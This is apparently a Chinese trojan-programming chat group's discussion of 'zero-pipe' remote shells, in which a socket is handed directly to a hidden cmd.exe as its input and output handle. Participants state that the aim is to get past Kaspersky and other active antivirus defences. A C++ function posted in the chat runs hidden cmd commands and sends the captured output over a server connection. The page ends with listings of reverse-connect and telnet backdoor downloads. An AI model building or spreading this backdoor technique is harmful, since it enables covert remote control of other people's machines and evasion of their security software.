冷风
草草细说下零管道 关注........
.μρ2ц清风
这个不光过卡巴了,,,基本上所有主动防御都过!!
包口SSM,微点,,,
夕草
hot patching
.μρ2ц清风
对啊..
冷风
用socket直接替换输入输出的handle,可以实现零管道
sulwan
颠覆核心编程啊
.μρ2ц清风
反正我是用零管道的..
幻影
si.hStdInput=hrp1;
si.hStdOutput=hwp2;
幻影
是格handle
.μρ2ц清风
呵呵,,有一点点小资料,,不过看不明白!!
幻影
而socket是整形吧?
夕草
黑防有文章介绍过
夕草
socket 是 unsigned long
幻影
对啊
你的意思是
si.hStdInput=sock1;
si.hStdOutput=sock1;
sulwan
整形
Lenk
做管道通讯?
sulwan
没错
sulwan
SOCKET socket(
int af,
int type,
int protocol
);
问下,可以理解这样吗
冷风
呵呵明白了....
.μρ2ц清风
int CCmdLine::DOSShell(char *command)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR Cmdline[300]={0}; //命令行缓冲
BYTE SendBuf[2048]={0}; //发送缓冲
SECURITY_ATTRIBUTES sa; //安全描述符
DWORD bytesRead=0;
std::string strBuffer;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
//创建匿名管道
if (!CreatePipe(&hRead,&hWrite,&sa,0))
goto Clean;//失败
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; //进程(cmd)的输出写入管道
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录
strcat(Cmdline,"//cmd.exe /c "); //拼接cmd
strcat(Cmdline,command); //拼接一条完整的cmd命令
//创建进程,也就是执行cmd命令
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
goto Clean;//失败
CloseHandle(hWrite);
while (TRUE)
{
//无限循环读取管道中的数据,直到管道中没有数据为止
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
m_hServer->Send(SendBuf,bytesRead);
memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零
Sleep(100); //休息一下
}
Clean:
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
return true;
}
幻影
这代码什么意思?
幻影
零管道?
.μρ2ц清风
零管道!!
夕草
就是把socket强制转换为handle类型
幻影
不是吧,这样能过卡吧了?
.μρ2ц清风
夕草在说什么呢??
夕草
不是过咔吧,我只是说零管道
.μρ2ц清风
呵呵,你自己测试过不过卡巴咯..
夕草
过卡巴,可以拷贝cmd.exe为abc.exe啊
幻影
(hWrite); 根本没有用啊啊
sulwan
你这样做内存消耗大吗
夕草
StartupInfo.hStdInput = (HANDLE)sclient;
幻影
可以拷贝cmd.exe为abc.exe啊--貌似没用,我这样用还是提示
.μρ2ц清风
零管道,不是我理解错了把..
只是创建一个pipe,卡巴之监控创建两个pipe的代码,,
不关socket的事!!!你拷贝CMD为其他名字一样监控..
夕草
零管道就是不用创建管道
Lenk
晚点再来。朋友们,慢慢讨论
.μρ2ц清风
他的流程是之创建CMD,然后执行命令,把管道里的数据读出来,,,关闭管道!!发送读到的数据!
.μρ2ц清风
晕,是不是我理解错了..零管道还有其他的说法??
sulwan
汗!我看我的思维是不行了!长见识了
夕草
零管道就是不用CreatePipe了
直接用socket接管输入输出句柄
.μρ2ц清风
好了,我回头再看看资料..也不用争论了,能过卡巴就是好马..哈哈!!
BlackFeather
赶紧学习···
结帖了 呵呵 零管道理解成幻影的可以吧
si.hStdInput=sock1;
si.hStdOutput=sock1;
by 木马编程技术讨论群 (44390702)
分享到:
相关推荐
放大镜建用户 放大镜建用户 放大镜建用户
MFC通过管道实现CMD命令返回串,可以看一看学习管道的应用,及实现CMD之间传递
cmd管道技术向cmd发送字符
此基于对话框的工程展示了如何用管道获取 Cmd命令的输出。 以 ping 命令为例子。获取ping后本应该输出到Dos窗口上的全部信息
可以直接拿来使用 本机基于匿名管道的cmd回显,vc,功能较简单可扩充
C++使用管道获取CMD命令结果 C++使用管道获取CMD命令结果 C++使用管道获取CMD命令结果
清凉CMD反向连接后门,仅供学习,希望大家不要学坏- -。。。。
易语言完全实现CMD模拟简单版源码,读管道,写管道,创建匿名管道,获取启动信息_,创建进程,读文件,写文件,关闭句柄,结束进程,打开进程句柄
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
摘要:VB源码,系统相关,CMD vB以管道方式获取CMD命令结果,源代码可直接编译,欢迎大家下载学习。
平时使用linux习惯了,管道命令是使用非常高频的,使用cmd也是想要,但是平时使用很少所以就忘记了,这里做个笔记。分享给大家。 Windows cmd 管道过滤命令findstr 学习文档 findstr命令类似于linux中的grep命令。 ...
服务器后门
这个是用c++写的一个cmd匿名管道重定向的工程。 希望对学者有很好的指引和修改。
适合学习但又搞不懂的新手,了解匿名管道的重定向作用
读管道,写管道,创建匿名管道,获取启动信息_,创建进程,读文件,写文件,关闭句柄,结束进程,打开进程句柄
利用管道重定向cmd输入输出,包含两个源码
mfc实现cmd控制台,MFC匿名管道通信 双向通信 VS2012源码 可以调用其他exe软件进行通信,模拟cmd.exe
易语言模拟CMD源码,模拟CMD,读管道,写管道,创建匿名管道,获取启动信息_,创建进程,读文件,写文件,关闭句柄,结束进程,打开进程句柄
在主机上设置一个50000端口的后门,本地主机可通过telnet获得远程主机的cmd。